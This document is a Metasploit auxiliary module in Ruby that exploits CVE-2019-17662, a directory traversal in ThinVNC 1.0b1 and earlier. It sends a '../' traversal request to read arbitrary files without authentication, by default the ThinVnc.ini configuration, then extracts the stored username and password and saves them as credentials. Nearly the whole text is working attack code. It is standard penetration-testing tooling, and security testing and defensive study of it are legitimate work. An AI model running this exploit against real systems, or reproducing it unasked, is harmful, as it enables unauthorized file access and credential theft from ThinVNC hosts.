ThinVNC Directory Traversal

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'ThinVNC Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in ThinVNC  
versions 1.0b1 and prior which allows unauthenticated users to retrieve  
arbitrary files, including the ThinVNC configuration file.  
  
This module has been tested successfully on ThinVNC versions 1.0b1  
and "ThinVNC_Latest" (2018-12-07).  
},  
'References' =>  
[  
['CVE', '2019-17662'],  
['URL', 'https://github.com/bewest/thinvnc/issues/5'],  
['URL', 'https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py'],  
['URL', 'https://redteamzone.com/ThinVNC/']  
],  
'Author' =>  
[  
'jinxbox', # Discovery and PoC  
'WarMarX', # PoC  
'bcoles' # metasploit  
],  
'DefaultOptions' => { 'RPORT' => 8080 },  
'DisclosureDate' => '2019-10-16',  
'License' => MSF_LICENSE  
))  
  
register_options(  
[  
OptString.new('FILEPATH', [true, 'The path to the file to read', 'ThinVnc.ini']),  
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 2])  
])  
end  
  
def run_host(ip)  
depth = datastore['DEPTH']  
filepath = datastore['FILEPATH']  
  
res = retrieve_file(depth, filepath)  
  
return if res.blank?  
  
filename = File.basename(filepath)  
  
path = store_loot(  
'thinvnc.traversal',  
'text/plain',  
ip,  
res.to_s,  
filename  
)  
  
print_good("File #{filename} saved in: #{path}")  
  
# Report vuln and store creds if we successfully retrieved the config file  
if filename.downcase == 'thinvnc.ini' && res.to_s.start_with?('[Authentication]')  
report_service(  
:host => ip,  
:port => rport,  
:sname => (ssl ? 'https' : 'http'),  
:info => 'ThinVNC'  
)  
  
report_vuln(  
:host => ip,  
:port => rport,  
:proto => 'tcp',  
:sname => (ssl ? 'https' : 'http'),  
:name => 'ThinVNC Directory Traversal',  
:info => 'ThinVNC Directory Traversal',  
:refs => self.references  
)  
  
username = res.scan(/^User=(.+)$/).flatten.first.to_s.strip  
password = res.scan(/^Password=(.+)$/).flatten.first.to_s.strip  
  
if username && password  
print_good "Found credentials: #{username}:#{password}"  
store_valid_credential(user: username, private: password)  
end  
end  
end  
  
def retrieve_file(depth, filepath)  
traversal = Rex::Text.rand_text_alphanumeric(3..5)  
traversal << '/'  
traversal << '../' * depth  
traversal << filepath  
  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, traversal)  
})  
  
unless res  
vprint_error 'No reply'  
return  
end  
  
if res.code == 404  
vprint_error 'File not found'  
return  
end  
  
if res.code != 200  
vprint_error 'Unexpected reply'  
return  
end  
  
res.body.to_s  
end  
end  
`